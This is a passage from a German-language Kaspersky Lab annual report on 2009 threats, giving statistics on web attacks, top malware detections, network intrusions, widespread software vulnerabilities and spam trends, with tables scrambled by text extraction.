Kaspersky Lab arbeitet derzeit an der Integration des
Systems in seine Unternehmenslösungen.
Mit Hilfe des Kaspersky Security Network können die
Kaspersky-Experten in Echtzeit auf neue Schadprogramme reagieren, für die noch keine Signaturen vorliegen, und die noch nicht heuristisch erfasst sind. KSN
macht es möglich, die Verbreitungsquelle von Schadprogrammen im Internet zu lokalisieren und diese für
die Anwender zu sperren.
Gleichzeitig verbessert KSN die Reaktionszeit auf
neue Bedrohungen entscheidend. Zum gegenwärtigen
Zeitpunkt kann die Ausführung eines neuen Schadprogramms auf den Computern der KSN-User innerhalb
weniger Sekunden nach Feststellung seines schädlichen Charakters blockiert werden. Anders als bisher
ist eine Aktualisierung der Antiviren-Datenbanken dafür
nicht mehr nötig.
Auf diesem Gebiet hat sich die Cyberkriminalität also
ganz offensichtlich recht schnell weiterentwickelt und
ist jetzt bereits in der Lage, vollwertige Botnetze aus
gehackten Websites aufzubauen, die sich selbst erhalten und weiter ausbreiten.
Zudem werden alle Möglichkeiten ausgeschöpft, die
soziale Netzwerke bieten. Die Beobachtungen von
Kaspersky Lab haben gezeigt, dass das Vertrauen
unter den Usern sehr groß ist: Die Wahrscheinlichkeit,
dass ein Anwender eines sozialen Netzwerks eine
von „Freunden“ geschickte Datei öffnet oder auf einen
Link klickt, der von einem „Freund“ empfohlen wurde,
ist ungefähr 10 Mal höher als beim Versand der Datei
oder des Links per E-Mail. Die Kriminellen machen sich
diese Tatsache bei der Verbreitung von Schadprogrammen und Spam zunutze.
Schon häufiger hat Kaspersky Lab über Drive-byDownloads berichtet. Bei dieser Methode wird der
Computer bei der ganz gewöhnlichen Arbeit im Internet
infiziert, ohne dass es der Anwender bemerkt. Im Jahr
2009 stieg die Zahl derartiger Angriffe
drastisch an, und es wurden in etwa
Die häufigsten Schadprogramme im Internet 2009
drei Mal so viele Attacken wie im Jahr
zuvor registriert. Dabei muss man beAnzahl der
Platz Name
Anteil
denken, dass hier von mehreren DutAngriffe
zend Millionen Angriffen die Rede ist.
1
HEUR:Trojan.Script.Iframer
9858304
13,39%
2
Trojan-Downloader.JS.Gumblar.x
2940448
3,99%
3
not-a-virus:AdWare.Win32.Boran.z
2875110
3,91%
4
HEUR:Exploit.Script.Generic
2571443
3,49%
5
HEUR:Trojan-Downloader.Script.Generic
1512262
2,05%
6
HEUR:Trojan.Win32.Generic
1396496
1,90%
7
Worm.VBS.Autorun.hf
1131293
1,54%
8
Trojan-Downloader.HTML.IFrame.sz
935231
1,27%
9
HEUR:Exploit.Script.Generic
752690
1,02%
10
Trojan.JS.Redirector.l
705627
0,96%
11
Packed.JS.Agent.bd
546184
0,74%
12
Trojan-Clicker.HTML.Agent.aq
379872
0,52%
13
HEUR:Trojan-Downloader.Win32.Generic
322166
0,44%
14
Trojan.JS.Agent.aat
271448
0,37%
15
Trojan-Downloader.Win32.Small.aacq
265172
0,36%
16
Trojan-Clicker.HTML.IFrame.ani
224657
0,31%
17
Trojan-Clicker.JS.Iframe.be
216738
0,30%
18
Trojan-Downloader.JS.Zapchast.m
193130
0,27%
19
Trojan.JSot-a-virus:AdWare.Win32.
175401
0,24%
20
GamezTar.a
170085
0,23%
27268356
37,30%
TOP 20 insgesamt
10
Im ersten Teil dieses Jahresberichts wurde ausführlich das Problem der Gumblar-Epidemie im Netz behandelt. In Wirklichkeit ist diese Epidemie aber nur die
Spitze des Eisbergs von Web-Infektionen, die in den
letzten Jahren zur wichtigsten Infizierungsart bei den
Computern von Anwendern geworden sind.
Mit Hilfe des Kaspersky Security
Network registriert und analysiert Kaspersky Lab alle Versuche, die Computer der Anwender bei aktiver Internetverbindung zu infizieren.
Im Jahr 2009 registrierte das KSN
73.619.767 erfolgreich abgewehrte Angriffe auf die Computer seiner Kunden
(im Jahr 2008 waren es 23.680.646).
Neben dem versuchten Download von
schädlicher und potentiell gefährlicher
Software waren unter den registrierten
Vorfällen 14.899.238 Versuche, auf
Phishing- oder Schad-Websites zuzugreifen, die von Kaspersky-Programmen blockiert wurden.
Von allen an Internet-Attacken beteiligten Schädlingen
hat Kaspersky Lab die 20 aktivsten Schadprogramme
ausgewählt. Jede dieser 20 Bedrohungen wurde mehr
als 170.000 Mal registriert, allein auf die Top 20 insgesamt entfielen über 37 Prozent (27.268.356) aller erfassten Vorfälle.
Den ersten Platz der Hitliste belegt mit beträchtlichem
Abstand die heuristische Erkennung von schädlichen
Links, die von Hackern und teilweise von den Schadprogrammen selbst in den Code der gehackten Sites
eingeschleust wird. Diese Links stellen eine verborgene
Verbindung zwischen dem Browser und einer anderen
Website her, auf der sich in der Regel die eigentlichen
Exploits für Browser und Anwendungen befinden.
Auf dem zweiten Platz befindet sich Gumblar. Bedenkt
man den Umfang der von diesem Schädling verursachten Epidemien, so ist das keine Überraschung:
Fast 3.000.000 Anfragen von Usern an Server des
entsprechenden Botnetzes wurden von der KasperskySoftware registriert. Man kann sich also ausmalen, wie
viele Millionen PCs diesem Schadprogramm zum Opfer hätten fallen können.
Bemerkenswert ist auch, dass das Werbeprogramm
Boran.z den dritten Platz der Top 20 des Jahres belegt.
Adware gehört neben Spam und Pornographie schon
seit langem zu den treibenden Kräften in der Struktur
der Cyberkriminalität.
Auf den ersten fünf Plätzen gibt es im Vergleich zum
Jahr 2008 keine Veränderung. Wie schon im Vorjahr
war der absolute Spitzenreiter unter den Ländern, von
deren Ressourcen die meisten Attacken ausgingen,
auch im Jahr 2009 wieder China. Der prozentuale Anteil der von China aus durchgeführten Webattacken hat
sich allerdings von 79 Prozent auf etwas unter 53 Prozent verringert. Den zweiten Platz belegen nach wie
vor die USA, wobei sich der Anteil der infizierten Server
auf dem Gebiet der Vereinigten Staaten wesentlich vergrößert hat, nämlich von 6,8 Prozent auf 19 Prozent.
Russland, Deutschland und die Niederlande bilden die
„zweite Garde“, deren Anteil im Jahr 2009 unwesentlich
zurückgegangen ist.
Die Führungsrolle Chinas sowohl bei der Entwicklung
von Schadprogrammen als auch nach Zahl der infizierten Websites hat bereits die Aufmerksamkeit der
Regierung und der Rechtschutzorgane des Landes auf
sich gezogen. Zur Bereinigung der Situation haben die
Behörden bereits eine Reihe von Maßnahmen ergriffen, die das Erscheinen von schädlichen Ressourcen
erschweren sollen. Jetzt kann ein Domainname in der
Anteil an der Gesamtzahl der Angriffe
Länder, die Malware hosten
Platz Land
Bei praktisch allen anderen Schädlingen der Hitliste handelt es sich mehr oder weniger um verschiedene Varianten von Exploits von Sicherheitslücken.
73.619.767 der von Kaspersky Lab im Jahr 2009 registrierten Angriffe gingen von Internet-Ressourcen in
174 verschiedenen Ländern aus. Über 97 Prozent aller erfassten Attacken haben ihren Ursprung in nur 20
Ländern.
Anteil
Platz Land
Anteil
1
China
52,70%
1
China
46,75%
2
Vereinigte Staaten
19,02%
2
Vereinigte Staaten
6,64%
3
Niederlande
5,86%
3
Russische Föderation
5,83%
4
Deutschland
5,07%
4
Indien
4,54%
5
Russische Föderation
2,58%
5
Deutschland
2,53%
6
Großbritannien
2,54%
6
Großbritannien
2,25%
7
Kanada
2,22%
7
Saudi Arabien
1,81%
8
Ukraine
2,17%
8
Brasilien
1,78%
Italien
1,74%
9
Lettland
1,53%
9
10
Frankreich
0,60%
10
Vietnam
1,64%
11
Spanien
0,49%
11
Mexiko
1,58%
12
Südkorea
0,48%
12
Frankreich
1,49%
13
Brasilien
0,44%
13
Ägypten
1,37%
14
Zypern
0,34%
14
Türkei
1,23%
Spanien
1,20%
15
Schweden
0,32%
15
16
Taiwan
0,27%
16
Ukraine
0,91%
17
Norwegen
0,23%
17
Kanada
0,81%
18
Israel
0,21%
18
Malaysia
0,80%
Thailand
0,76%
Kasachstan
0,71%
19
Luxemburg
0,16%
19
20
Estland
0,16%
20
TOP 20 insgesamt
97,38%
TOP 20 insgesamt
Die Top 20 der Schadprogramme im Internet
86,37%
11
Vom IDS in Kaspersky Internet Security erkannte Netzwerkattacken
Platz Name
Anteil
156.550.484
71,192%
1
DoS.Generic.SYNFlood
2
Intrusion.Win.NETAPI.buffer-overflow.exploit
32.605.798
14,828%
3
Intrusion.Win.MSSQL.worm.Helkern
23.263.431
10,579%
4
Intrusion.Win.DCOM.exploit
3.245.943
1,476%
5
Scan.Generic.UDP
1.799.685
0,818%
6
Intrusion.Win.LSASS.exploit
812.775
0,370%
7
Intrusion.Generic.TCP.Flags.Bad.Combine.attack
604.621
0,275%
8
Intrusion.Win.LSASS.ASN1-kill-bill.exploit
555.107
0,252%
9
DoS.Generic.ICMPFlood
131.925
0,060%
10
Scan.Generic.TCP
101.737
0,046%
11
Intrusion.Win.HTTPD.GET.buffer-overflow.exploit
86.511
0,039%
12
Intrusion.Win.MediaPlayer.ASX.buffer-overflow.exploit
24.375
0,011%
13
Intrusion.Win.SMB.CVE-2009-3103.exploit
19.378
0,009%
14
Intrusion.Win.WINS.heap-overflow.exploit
15.200
0,007%
15
Intrusion.Generic.OmniWeb.Alert.format-string.exploit
14.291
0,006%
16
Intrusion.Win.Messenger.exploit
10.296
0,005%
17
DoS.Win.IGMP.Host-Membership-Query.exploit
8.976
0,004%
18
Intrusion.Win.PnP.exploit
8.783
0,004%
19
Intrusion.Win.EasyAddressWebServer.format-string.exploit
6.561
0,003%
20
DoS.Generic.Land
3.505
0,002%
TOP 20 insgesamt
219.869.382
99,986%
Zone .cn ausschließlich schriftlich per Formular beantragt werden, und zwar erst, nachdem der Antragsteller
persönlich eine Bescheinigung und Lizenz zur Bestätigung seiner kommerziellen Tätigkeit vorgelegt hat.
Aufgrund der Nichtbeachtung dieser Normen wurden
bereits verschiedene chinesische Firmen geschlossen,
die Domains registrieren.
Praktisch umgehend nach der Einführung der genannten Maßnahmen Ende 2009 wurde in Spam-Mails ein
Rückgang von Links auf chinesische Domains verzeichnet. Es bleibt zu hoffen, dass sich diese Tendenz
im Jahr 2010 auch auf andere Infizierungs- und Betrugsmethoden ausweiten wird.
Ein weiterer nicht weniger aussagekräftiger Indikator beschreibt, in welchen Ländern und Regionen die
Computer der Anwender am häufigsten Angriffen ausgesetzt waren. Die Tabelle „Anteil an der Gesamtzahl
der Angriffe“ auf der vorhergehenden Seite zeigt die
zwanzig am stärksten von Virus-Infektionen betroffen
Länder — auf die Computer ihrer Einwohner entfielen
mehr als 86 Prozent der 73.619.767 registrierten Infizierungen.
Im Vergleich zum Vorjahr haben sich hier bedeutende
Veränderungen ergeben. China ist nach Anzahl der
potenziellen Opfer immer noch führend, doch sein Gesamtanteil verringerte sich auf 7 Prozent. Ägypten, die
Türkei und Vietnam waren die anderen Spitzenreiter
des Jahres 2008, scheinen aber bei weitem nicht mehr
12
Anzahl
so interessant für die Cyberkriminellen zu sein wie
noch im Vorjahr. Gleichzeitig ist die Zahl der Angriffe
auf Bürger der USA, Deutschlands, Großbritanniens
und Russlands wesentlich gestiegen.
Nach Meinung der Kaspersky-Experten sind diese Veränderungen in Richtung Web-Attacken eine Folge der
weltweiten Wirtschaftskrise. Auch im Netz stand immer
weniger Geld zur Verfügung, und die anfänglich rasche
Zunahme von Online-Banking-Usern hat sich in manchen Ländern stark verlangsamt. Die Kriminellen waren also gezwungen, sich auf „reichere“ Märkte zu konzentrieren, wo die Wahrscheinlichkeit wesentlich höher
ist, mit der Infizierung von Rechnern auch wirklich Geld
zu verdienen.
Auch die chinesischen Kriminellen haben ihren Beitrag
zu diesem Prozess geleistet und attackieren ihre eigenen Landsleute nun seltener. Über die abnehmende
Aktivität von Game-Trojanern hat Kaspersky Lab bereits berichtet. Möglicherweise sehen wir nun mit den
Attacken über das Web die Folge dieser Tendenz.
Netzattacken
Ein nicht mehr wegzudenkender Teil jedes modernen
Antiviren-Programms ist die Firewall. Sie blockiert
verschiedene Angriffe von außen, die nicht über den
Browser durchgeführt werden, und soll zudem Versuche vereiteln, Anwenderdaten vom Computer zu
stehlen. Die in Kaspersky Internet Security integrierte
Platz 1 der Top 20 (siehe Grafik auf der linken Seite)
belegt wie auch im Vorjahr die simple und weit verbreitete Attacke DoS.Generic.SYNFlood, die bei erfolgreichem Einsatz den angegriffenen Computer außer
Gefecht setzen kann. Dieser Angriffstyp wird heute von
den meisten modernen Erkennungssystemen aufgedeckt. Auf dem zweiten Platz befindet sich mit NETAPI.
buffer-overflow.exploit eine interessantere und gefährlichere Bedrohung, bei der es sich um die Umsetzung
der Sicherheitslücke MS08-067 handelt.
Eben diese Schwachstelle nutzt auch der zu trauriger
Berühmtheit gelangte Wurm Kido aus. Der Exploit wurde Ende 2008 entdeckt und positionierte sich im entsprechenden Ranking desselben Jahres auf Platz 4. Im
Jahr 2009 entfiel der Löwenanteil der 32 Millionen erkannten und abgewehrten Infizierungsversuche unter
Ausnutzung von MS08-067 zweifellos auf Kido.
von ihnen entfielen 28.597.901 Vorfälle, das entspricht
27 Prozent. Die Schadprogramme der folgenden Top
20 sind die am weitesten verbreiteten Bedrohungen
des Jahres 2009.
Auf mehr als drei Millionen Computern wurden Infizierungsversuche blockiert, die erfolgreich mit Hilfe
heuristischer Methoden aufgedeckt werden konnten. Die meisten der auf diese Weise erkannten Objekte hielten Einzug in das Jahresranking, und zwar:
HEUR:Trojan.Win32.Generic, HEUR:Worm.Win32.Generic, HEUR:Trojan-Downloader.Win32.Generic und
HEUR:Trojan.Win32.StartPage.
Wie schon an anderer Stelle beschrieben, geht die
weitreichendste Epidemie des Jahres auf das Konto
des Wurms Kido (Conficker), der Millionen Computer
rund um den Globus infizierte. In der Liste der 20 am
weitesten verbreiteten Bedrohungen sind gleich drei
Modifikationen dieses Wurms vertreten – Kido.ir, Kido.
ih und Kido.iq. Die Gesamtzahl der von ihnen kompromittierten Computer übersteigt den Anteil des Spitzenreiters HEUR:Trojan.Win32.Generic um mehr als eineinhalb Millionen.
Einen Platz unter Kido.ih und damit auf Position 3 befindet sich der Virus Sality.aa, der im vergangenen Jahr
eine globale Epidemie auslöste und die Jahresstatistik
2008 anführte. Dazu sei gesagt, dass er sich nicht lange halten konnte und die Netzwürmer ihre Positionen
verteidigten.
Auch der Wurm Helkern (Slammer) hält sich weiter hartnäckig im Netz. Obwohl er bereits seinen siebten
Geburtstag feiert, ist er in der Hitliste weiterhin
Am weitesten verbreitete Bedrohungen 2009
vorne mit dabei – auf ihn entfielen 23 Millionen
blockierter Infizierungsversuche. Ein ebenso
Anzahl
alter Hase ist der Exploit auf Position 4 - RPCPlatz Gefundenes Objekt
infizierter
DCOM (MS03-026). Diese Sicherheitslücke war
Rechner
die Ursache für den Ausbruch der globalen Epi1
HEUR:Trojan.Win32.Generic
3050753
demie des Wurms Lovesan im August 2003.
Lokale Infektionen
Untrennbarer Bestandteil jeder modernen Antiviren-Software ist die Firewall. Sie kann unterschiedliche Angriffe auf den Computer abwehren, die von außen und nicht über den Browser
initiiert werden. Die Firewall hat zudem die Aufgabe, Datendiebstahl auf dem Computer zu verhindern.
Ein überaus wichtiger Indikator ist die Statistik
der lokalen Infizierungen von Anwendercomputern. Zu diesen Daten gehören Objekte, die
über das Web, über E-Mail oder Netzwerkports
in die Computer eindringen. Die AV-Lösungen
von Kaspersky Lab erkannten erfolgreich über
100 Millionen — nämlich genau 107.370.258 —
Viren-Vorfälle auf Anwendercomputern, die an
das Kaspersky Security Network angeschlossen
sind.
Bei diesen Vorfällen wurden 703.700 verschiedene schädliche und potentiell unerwünschte
Programme registriert. Auf die ersten Hundert
2
Net-Worm.Win32.Kido.ih
2924062
3
Virus.Win32.Sality.aa
1407976
4
Net-Worm.Win32.Kido.ir
1176726
5
UDS:DangerousObject.Multi.Generic
620716
6
Packed.Win32.Black.d
527718
7
Net-Worm.Win32.Kido.iq
518120
8
HEUR:Worm.Win32.Generic
516467
9
Virus.Win32.Virut.ce
488852
10
not-a-virus:AdWare.Win32.Boran.z
466106
11
Virus.Win32.Induc.a
455798
12
HEUR:Trojan-Downloader.Win32.Generic
436229
13
HEUR:Trojan.Win32.StartPage
412245
14
MultiPacked.Multi.Generic
377741
15
Trojan-Downloader.Win32.VB.eql
362685
16
Worm.Win32.FlyStudio.cu
361056
17
Trojan-Dropper.Win32.Flystud.yo
356950
18
Packed.Win32.Black.a
333705
19
Packed.Win32.Klone.bj
320665
20
Trojan.Win32.Chifrax.a
296947
Firewall verfügt über eine Funktion zur Erkennung eingehender Pakete (Intrusion Detection System, IDS).
Dazu gehören Exploits, die Schwachstellen in Netzservices des Betriebssystems ausnutzen und ungepatchte
Systeme infizieren können oder den Kriminellen sogar
den vollständigen Zugriff auf diese ermöglichen. Im
Jahr 2009 wehrte das in Kaspersky Internet Security
2010 integrierte IDS ganze 219.899.678 Netzattacken
ab. Im Jahr 2008 betrug dieser Wert nur etwas über 30
Millionen derartiger Angriffe.
TOP 20 insgesamt
13
Neben Sality sind im Ranking allerdings noch zwei weitere Viren enthalten, von denen einer ein klassischer
Datei-Virus ist und der andere sich noch nicht einmal
in das bestehende Klassifizierungsschema einordnen
lässt.
Der erste – Virus.Win32.Virut.ce – infiziert nicht nur
ausführbare Dateien, sondern auch Webserver und
verbreitet sich zudem auch mit Hilfe von P2P-Netzen.
Diese Virus-Epidemie zählte auch zu den auffälligsten
Ereignissen des Jahres.
Bei dem zweiten – Virus.Win32.Induc.a – handelt es
sich um ein hochinteressantes Machwerk der Virenschreiberzunft. Für die Selbstreproduktion verwendet der Virus einen Mechanismus der zweistufigen
Entwicklung ausführbarer Dateien, der in der DelphiUmgebung umgesetzt wird. Entsprechend diesem
Mechanismus wird der Quellcode der Anwendungen
zunächst in Übergangs-Modulen (dci-Dateien, Delphi
Compiled Units) kompiliert, aus denen daraufhin die in
Windows ausführbaren Dateien entnommen werden.
Glücklicherweise verfügt der Virus bisher neben der
Infizierung selbst über keine weiteren Funktionalitäten,
doch er demonstriert sehr anschaulich einen potentiell
neuen Typ von Infizierungen. Auch die verspätete Entdeckung von Induc (infizierte Dateien traten Ende 2008
auf, entdeckt wurde er erst im August 2009) ist damit
zu erklären, dass diesem Virus außer der Reproduktion
jegliche schädliche Funktion fehlt.
Dank dem zum Kaspersky Security Network gehörenden Urgent Detection System (UDS) zur schnellen Erkennung von Bedrohungen konnten mehr als
600.000 Computer von Usern in Echtzeit geschützt
werden, und neue Schaddateien wurden innerhalb
kürzester Zeit als UDS:DangerousObject.Multi.Generic
klassifiziert.
Zu erwähnen ist auch eine große Anzahl an Schadprogrammen, die mit Hilfe der Skriptsprache FlyStudio
entwickelt wurden. Drei Vertreter dieser Schädlingsart
konnten sich im Ranking platzieren — Worm.Win32.
FlyStudio.cu, Trojan-Dropper.Win32.Flystud.yo und
Packed.Win32.Klone.bj. Bedenkt man, dass FlyStudio
in erster Linie von chinesischen Kriminellen eingesetzt
wird, so ist die Tatsache, dass seine Vertreter den
Sprung ins Jahresranking schafften, eine Bestätigung
für das im ersten Teil des Kaspersky Virus Bulletin Gesagte: China gehört jetzt tatsächlich zu den führenden
Lieferanten von Schadprogrammen.
Eine weitere sehr auffällige Tendenz in der Entwicklung
von Schadprogrammen war im letzten Jahr das Packen
und die Verschleierung mit Hilfe speziell entwickelter
Packprogramme, was selbst die Entdeckung und Erkennung bereits bekannter Samples erschwert. In der
Hitliste erscheinen einige Vertreter derartiger Packer,
die zu dem Typ Packed gehören: Black.a, Black.d und
Klone.bj.
14
Schwachstellen
Schwachstellen in Softwareprodukten stellen die größte Gefahr für die Sicherheit von Computern dar. Sie
können es Cyberkriminellen unter Umständen ermöglichen, die bestehenden Schutzmechanismen zu umgehen und den Computer anzugreifen.
Die umfassendste Epidemie des Jahres 2009 war die
des Wurms Kido und wurde durch die Entdeckung einer
weiteren kritischen Sicherheitslücke im Betriebssystem
Windows verursacht. Allerdings ist die Infizierung der
Computer über den Browser wie auch schon im Jahr
2008 die am weitesten verbreitete Eindringungsmethode von Schadprogrammen ins System. Dabei muss der
Browser selbst gar keine Sicherheitslücke aufweisen,
wenn Schwachstellen in verschiedenen Plug-ins und
Anwendungen vorhanden sind, mit denen der Browser
interagiert.
Mit Hilfe seines Schwachstellenscanners konnte Kaspersky Lab im Jahr 2009 insgesamt 404 verschiedene
Sicherheitslücken aufdecken. Dabei kamen die Experten auf eine Gesamtzahl von 461.828.538 verwundbaren Dateien und Anwendungen auf den Computern
der Anwender. Kaspersky Lab hat die 20 am weitesten
verbreiteten Schwachstellen analysiert. Auf sie entfielen 90 Prozent (415.608.137) aller verwundbaren Dateien und Anwendungen, die die Antiviren-Lösungen
auf den Computern der Anwender identifiziert haben
(siehe rechte Seite).
Die ersten beiden der fünf am weitesten verbreiteten
Sicherheitslücken wurden im Jahr 2009 entdeckt, die
Schwachstellen auf Position 3 und 4 schon im Jahr
2008, und die fünftplatzierte Microsoft XML Core Services Multiple Vulnerabilities bereits im Jahr 2007.
Gemessen an der Zahl der auf den Computern der
Anwender entdeckten Dateien und Anwendungen war
eine Schwachstelle in Apple QuickTime 7.x die am weitesten verbreitete Sicherheitslücke des Jahres 2009.
Mehr als 70 Prozent aller Schwachstellen wurden in
eben diesem Produkt erkannt. Bereits im Vorjahr war
QuickTime nach Anzahl der Schwachstellen mit über
80 Prozent der Spitzenreiter dieser Statistik.
Es folgt eine Aufstellung der Hersteller, in deren Produkten die meisten der Top-20-Schwachstellen gefunden wurden:
Platz
Nr.
Name
Anzahl verwundbarer
Dateien
Anteil
1
33632
Apple QuickTime Multiple
Vulnerabilities
165.658.505
2
35091
Vulnerabilities
3
31821
4
5
Prio
Auswirkung
Datum
35,87% Hochkritisch
Systemzugriff
22.01.09
68.645.338
14,86% Hochkritisch
Systemzugriff
22.05.09
Vulnerabilities
58.141.113
12,59% Hochkritisch
Systemzugriff
10.09.08
29293
Vulnerabilities
38.368.954
8,31% Hochkritisch
Systemzugriff
10.06.08
23655
Microsoft XML Core Services
Multiple Vulnerabilities
8.906.277
1,93% Hochkritisch
Cross-Site-Scripting, DoS,
Systemzugriff
09.01.07
25.02.09
6
34012
Adobe Flash Player Multiple
Vulnerabilities
7.728.963
1,67% Hochkritisch
Umgehung der Systemsicherheit, Aufdecken
vertraulicher Informationen,
Rechteausweitung, Systemzugriff
7
34451
Sun Java JDK / JRE Multiple
Vulnerabilities
6.783.414
1,47% Hochkritisch
Umgehung der Systemsicherheit, DoS, Systemzugriff
26.03.09
8
29320
Microsoft Outlook „mailto:“
URI Handling Vulnerability
6.336.962
1,37% Hochkritisch
Systemzugriff
11.03.08
9
35364
Microsoft Excel Multiple
Vulnerabilities
6.290.278
1,36% Hochkritisch
Systemzugriff
09.06.09
10
35377
Microsoft Office Word Two
Vulnerabilities
6.088.207
1,32% Hochkritisch
Systemzugriff
09.06.09
11
34572
Microsoft PowerPoint
OutlineTextRefAtom Parsing
Vulnerability
5.704.617
1,24%
Systemzugriff
03.04.09
12
31744
Microsoft Office OneNote URI
Handling Vulnerability
5.652.570
Systemzugriff
09.09.08
32270
Security Issues and Vulnerabilities
Umgehung der Systemsicherheit, Cross-SiteScripting, Datenmanipula
tion, Aufdecken
vertraulicher Informationen
16.10.08
14
35948
Vulnerabilities
5.073.297
1,10% Hochkritisch
Umgehung der Systemsicherheit, Aufdecken
vertraulicher Informationen,
Systemzugriff
23.07.09
15
30285
Microsoft Office Word Multiple Vulnerabilities
4.984.582
1,08% Hochkritisch
Systemzugriff
09.12.08
16
31453
Microsoft Office PowerPoint
Multiple Vulnerabilities
4.203.122
0,91% Hochkritisch
Systemzugriff
12.08.08
17
30150
Microsoft Publisher Object
Handler Validation Vulnerability
3.965.019
0,86% Hochkritisch
Systemzugriff
13.05.08
18
32991
Sun Java JDK / JRE Multiple
Vulnerabilities
2.980.650
0,65% Hochkritisch
Umgehung der Systemsicherheit, Aufdecken von
Systeminformationen, Aufdecken von vertraulichen
Daten, DoS, Systemzugriff
04.12.08
19
31593
Microsoft Excel Multiple
Vulnerabilities
2.604.816
0,56% Hochkritisch
Systemzugriff
09.12.08
20
26027
Vulnerabilities
2.413.232
0,52% Hochkritisch
Aufdecken von vertraulichen Informationen,
Systemzugriff
11.07.07
13
Top 20 insgesamt
5.078.221
415.608.137
Extrem
kritisch
1,225% Hochkritisch
1,10%
Mäßig
kritisch
Am weitesten verbreitete Schwachstellen 2009
89,99%
15
Im vergangenen Jahr waren noch sieben Firmen in dieser Aufstellung vertreten, jetzt sind es nur noch vier.
Wie auch schon im Vorjahr ist Microsoft mit zehn
Sicherheitslückend führend, was nicht weiter überrascht, da es hier um die Plattform Windows geht.
Neun dieser Schwachstellen wurden in Programmen
des Office-Pakets gefunden, also zum Beispiel in
Word, Excel, Outlook oder PowerPoint.
Auf Apple entfielen vier Schwachstellen, die alle in
QuickTime entdeckt wurden.
Die Gesamtsituation hat sich also gegenüber dem Jahr
2008 überhaupt nicht verändert. Die verwundbarsten
Anwendungen auf modernen Windows-Systemen sind
nach wie vor QuickTime und MS Office.
Adobe ist der dritte Software-Hersteller in unserem
Diagramm und nicht viel weniger anfällig. Alle vier
Schwachstellen, die auf sein Konto gehen, gehören
allesamt zu ein und demselben Produkt, und zwar zu
Adobe Flash Player. Zwei der vier Sicherheitslücken
wurden im Jahr 2009 entdeckt. Auch hier hat sich die
Situation im Laufe eines Jahres nicht zum Besseren
gewandelt, sondern höchstens weiter verschlechtert.
Die Siegertreppe der gefährlichsten Anwendungen des
Jahres 2009 ist also folgendermaßen besetzt:
QuickTime
Microsoft Office
Adobe Flash Player
Die Aufstellung der zwanzig am weitesten verbreiteten
Schwachstellen hinsichtlich ihrer Auswirkungen ergibt
folgende Grafik:
Alle zwanzig am häufigsten entdeckten Sicherheits
lücken zählen zu der Kategorie “remote”. Das bedeutet, dass sie von den Cyberkriminellen ausgenutzt werden können, selbst wenn sie keinen lokalen Zugriff auf
den Computer haben.
Die Ausnutzung jeder dieser Schwachstellen hat unterschiedliche Auswirkungen auf das angegriffene System.
Die gefährlichste Folge ist der „Systemzugriff“, der den
16
Kriminellen vollen Zugriff auf das System ermöglicht.
Neunzehn der aufgeführten Sicherheitslücken ermöglichen den „Systemzugriff“, fünf davon können das Abfließen wichtiger Informationen zur Folge haben.
17
Teil 3: Spam
Zahlen und Fakten des Jahres
► Im Jahr 2009 betrug der Spam-Anteil im E-MailTraffic 85,2 Prozent.
► Die meisten Spam-Mails (16 Prozent) kamen im
vergangenen Jahr aus den USA, ebenso viel Spam
wurde aus den asiatischen Ländern verschickt.
► Der Anteil an Phishing-Mails betrug 0,86 Prozent.
► Schädliche Anhänge waren in 0,85 Prozent der EMails enthalten.
► Die weltweite Wirtschaftskrise hatte großen Einfluss
auf die Spam-Themen.
► Nach wie vor ist SMS-Betrug in Spam-Mails bei den
Cyberkriminellen sehr beliebt.
► Spam-Mails enthielten erstmals Links auf SpamVideoclips bei YouTube.
► Die Einsatzmethoden von HTML zur Tarnung von
Links in Spam-Mails wurden weiter verbessert.
► Erneut kamen verschiedene Arten von Grafiken
zum Einsatz, um die Spam-Filter zu umgehen.
► Um die Anwender neugierig zu machen, wurden
wieder aktuelle Themen und die Namen bekannter
Persönlichkeiten verwendet.
► Die Spammer machten sich die Beliebtheit sozialer
Netzwerke zu Nutze.
Spam-Anteil
Der Anteil von Spam im E-Mail-Traffic betrug im Jahr
2009 durchschnittlich 85,2 Prozent und damit 3,1 Prozent mehr als 2008. Die größte Spam-Menge wurde mit
93 Prozent am 22. Februar registriert, die geringste am
26. April mit 72,8 Prozent.
(Februar). Im zweiten Halbjahr waren die monatlichen
Schwankungen geringer und variierten von Juli bis August um nicht mehr als 2,5 Prozent. Wie auch schon
2008 verringerte sich der Spam-Anteil im Dezember.
2008 waren die Unterschiede noch weitaus größer. Der
prozentuale Spam-Anteil im E-Mail-Traffic schwankte
damals in den einzelnen Monaten zwischen 73,7 Prozent und 90,7 Prozent. Ob diese Entwicklung bedeutet,
dass die Spam-Menge nicht mehr so schnell zunimmt
wie in den vergangenen Jahren und dass sich der
Spam-Anteil bei einem Prozentsatz um die 85 Prozent
einpendelt, wird die Zukunft zeigen.
Spam-Ursprungsländer
Spam-Ursprungsländer 2009
Im Runet (Bezeichung für das russische Internet) waren die USA im Jahr 2009 der Spitzenreiter unter den
Spam-Ursprungsländern. Den zweiten Platz belegt
Russland, und auf Position drei liegt Brasilien. Zur Erinnerung: Im Jahr 2008 waren die Plätze auf dem Siegertreppchen anders verteilt – Platz eins belegte Russland,
gefolgt von den USA und Spanien auf Platz 2 und 3.
Wie bereits im Halbjahresbericht „Kaspersky Lab Halbjahresbericht 2009 – Spam im ersten Halbjahr 2009“
(www.viruslist.com/de/analysis?pubid=200883660) erwähnt, wurde im letzten Jahr sehr viel weniger Spam
aus Westeuropa, dafür aber mehr unerwünschte Post
aus den asiatischen und lateinamerikanischen Ländern
versendet.
Die im Laufe des Jahres 2009 festgestellten Veränderungen im Spam-Versand sind in der folgenden Grafik
nach Ländern sortiert dargestellt:
Spam-Anteil im Jahr 2009
Der gesamte Spam-Anteil am E-Mail-Traffic schwankte im Laufe des Jahres im Monatsmittel niemals um
mehr als 5 Prozent. Der durchschnittliche prozentuale
Anteil von Spam innerhalb eines Monats bewegte sich
zwischen 82,6 Prozent (Dezember) und 87,2 Prozent
18
Spam-Herkunftsländer
nach Quartalen)
(Prozentualer
Spam-Anteil
Die Grafik zeigt einen starken
Anstieg der aus den USA stammenden Spam-Mails. Damit ging
allerdings auch eine sprunghafte
Zunahme infizierter amerikanischer Domains einher, über den
die
Kaspersky-Virenanalysten
bereits im dritten Quartalsbericht
2009 berichteten.
Spam-Themen
Verteilung der 2009 in Spam-Mails verwendeten Themen

Gesundheit und Medikamente
18,9 Prozent (- 4,7 Prozent)

Bildung
15,9 Prozent (+ 3,9 Prozent)

Elektronische Werbedienstleistungen

Andere Waren und Dienstleistungen
11,2 Prozent (- 4,9 Prozent)
Im Gegensatz zum Spam-Anteil haben sich bei den
